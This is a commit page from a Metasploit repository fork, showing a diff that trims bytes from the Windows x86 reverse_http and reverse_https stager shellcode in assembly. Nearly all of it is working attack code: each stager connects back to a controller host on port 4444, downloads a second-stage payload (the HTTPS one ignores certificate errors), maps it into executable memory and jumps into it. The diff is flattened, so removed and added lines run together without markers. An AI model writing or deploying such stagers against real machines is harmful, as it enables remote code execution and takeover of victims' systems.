adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Golf a few bytes off of reverse_http(s)

Browse Source
This commit is contained in:
James Lee
2014-01-27 11:42:23 -06:00
parent b9e234f62d
commit bfc0ac4dd4
4 changed files with 92 additions and 87 deletions
Download Patch File Download Diff File Expand all files Collapse all files
external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
Vendored
+16 -20
View File
@@ -27,10 +27,7 @@ internetopen:
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
jmp short dbl_get_server_host
internetconnect:
pop ebx ; Save the hostname pointer
xor ecx, ecx
push ecx ; DWORD_PTR dwContext (NULL)
push ecx ; dwFlags
@@ -38,36 +35,35 @@ internetconnect:
push ecx ; password
push ecx ; username
push dword 4444 ; PORT
push ebx ; HOSTNAME
jmp short dbl_get_server_host ; push pointer to HOSTNAME
got_server_host:
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
jmp get_server_uri
httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00000200 | ; INTERNET_FLAG_NO_UI
;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
push edx ; accept types
push edx ; referrer
push edx ; version
push ecx ; url
jmp get_server_uri ; push pointer to url
got_server_uri:
push edx ; method
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
xchg esi, eax ; hHttpRequest in esi
set_retry:
push byte 0x10
pop ebx
pop ecx
httpsendrequest:
xor edi, edi
@@ -82,23 +78,23 @@ httpsendrequest:
jnz short allocate_memory
try_it_again:
dec ebx
jz failure
jmp short httpsendrequest
loopnz httpsendrequest
; fall through to failure
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
dbl_get_server_host:
jmp get_server_host
get_server_uri:
call httpopenrequest
call got_server_uri
server_uri:
db "/12345", 0x00
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
allocate_memory:
push byte 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
@@ -135,7 +131,7 @@ execute_stage:
ret ; dive into the stored stage address
get_server_host:
call internetconnect
call got_server_host
server_host:
external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
Vendored
+19 -23
View File
@@ -22,15 +22,12 @@ internetopen:
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push byte 0 ; NULL pointer
push byte 0 ; NULL pointer
push esp ; LPCTSTR lpszAgent ("\x00")
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
jmp short dbl_get_server_host
internetconnect:
pop ebx ; Save the hostname pointer
xor ecx, ecx
push ecx ; DWORD_PTR dwContext (NULL)
push ecx ; dwFlags
@@ -38,38 +35,37 @@ internetconnect:
push ecx ; password
push ecx ; username
push dword 4444 ; PORT
push ebx ; HOSTNAME
jmp short dbl_get_server_host ; push pointer to HOSTNAME
got_server_host:
push eax ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
jmp get_server_uri
httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
;0x00000200 ; INTERNET_FLAG_NO_UI
push edx ; accept types
push edx ; referrer
push edx ; version
push ecx ; url
jmp get_server_uri ; push pointer to url
got_server_uri:
push edx ; method
push eax ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
xchg esi, eax ; hHttpRequest in esi
set_retry:
push byte 0x10
pop ebx
pop ecx
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
@@ -83,7 +79,7 @@ set_security_options:
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push esi ; hHttpRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
@@ -100,23 +96,23 @@ httpsendrequest:
jnz short allocate_memory
try_it_again:
dec ebx
jz failure
jmp short set_security_options
loopnz set_security_options
; fall through to failure
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
dbl_get_server_host:
jmp get_server_host
get_server_uri:
call httpopenrequest
call got_server_uri
server_uri:
db "/12345", 0x00
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
allocate_memory:
push byte 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
@@ -153,7 +149,7 @@ execute_stage:
ret ; dive into the stored stage address
get_server_host:
call internetconnect
call got_server_host
server_host: